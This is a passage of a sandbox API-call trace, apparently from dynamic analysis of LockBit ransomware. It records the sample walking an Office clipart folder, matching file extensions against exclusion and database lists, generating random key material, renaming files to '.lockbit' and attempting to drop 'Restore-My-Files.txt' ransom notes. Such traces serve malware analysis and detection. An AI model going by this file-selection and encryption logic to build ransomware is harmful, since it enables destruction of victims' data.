(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.818] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153307.WMF", cAlternateFileName="")) returned 1 [0146.818] lstrcmpiW (lpString1=".", lpString2="J0153307.WMF") returned -1 [0146.818] lstrcmpiW (lpString1="..", lpString2="J0153307.WMF") returned -1 [0146.818] PathFindExtensionW (pszPath="J0153307.WMF") returned=".WMF" [0146.818] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.818] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.819] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.819] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153307.WMF") returned 1 [0146.819] lstrcmpiW (lpString1="ntldr", lpString2="J0153307.WMF") returned 1 [0146.819] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153307.WMF") returned 1 [0146.819] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153307.WMF") returned -1 [0146.819] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153307.WMF") returned -1 [0146.820] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153307.WMF") returned 1 [0146.820] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153307.WMF") returned -1 [0146.820] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.820] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned=".WMF" [0146.820] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.820] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.820] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.821] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF.lockbit") returned 72 [0146.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.821] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.821] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.821] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15448) returned 1 [0146.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.822] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.826] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.826] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.826] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.828] free (_Block=0x1fa2ed8) [0146.828] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.828] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.828] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.828] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4238, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153313.WMF", cAlternateFileName="")) returned 1 [0146.828] lstrcmpiW (lpString1=".", lpString2="J0153313.WMF") returned -1 [0146.828] lstrcmpiW (lpString1="..", lpString2="J0153313.WMF") returned -1 [0146.828] PathFindExtensionW (pszPath="J0153313.WMF") returned=".WMF" [0146.828] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.828] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.829] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.829] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153313.WMF") returned 1 [0146.830] lstrcmpiW (lpString1="ntldr", lpString2="J0153313.WMF") returned 1 [0146.830] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153313.WMF") returned 1 [0146.830] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153313.WMF") returned -1 [0146.830] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153313.WMF") returned -1 [0146.830] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153313.WMF") returned 1 [0146.830] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153313.WMF") returned -1 [0146.830] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.830] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned=".WMF" [0146.830] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.830] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.830] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.831] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.831] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF.lockbit") returned 72 [0146.831] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.832] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.832] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.832] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16952) returned 1 [0146.832] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.833] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.837] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.837] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.837] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.839] free (_Block=0x1fa2ed8) [0146.839] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.839] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.839] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4464, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153398.WMF", cAlternateFileName="")) returned 1 [0146.839] lstrcmpiW (lpString1=".", lpString2="J0153398.WMF") returned -1 [0146.839] lstrcmpiW (lpString1="..", lpString2="J0153398.WMF") returned -1 [0146.839] PathFindExtensionW (pszPath="J0153398.WMF") returned=".WMF" [0146.839] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.839] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.840] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153398.WMF") returned 1 [0146.840] lstrcmpiW (lpString1="ntldr", lpString2="J0153398.WMF") returned 1 [0146.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153398.WMF") returned 1 [0146.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153398.WMF") returned -1 [0146.840] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153398.WMF") returned -1 [0146.840] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153398.WMF") returned 1 [0146.840] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153398.WMF") returned -1 [0146.841] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.841] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned=".WMF" [0146.841] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.841] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.841] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.841] 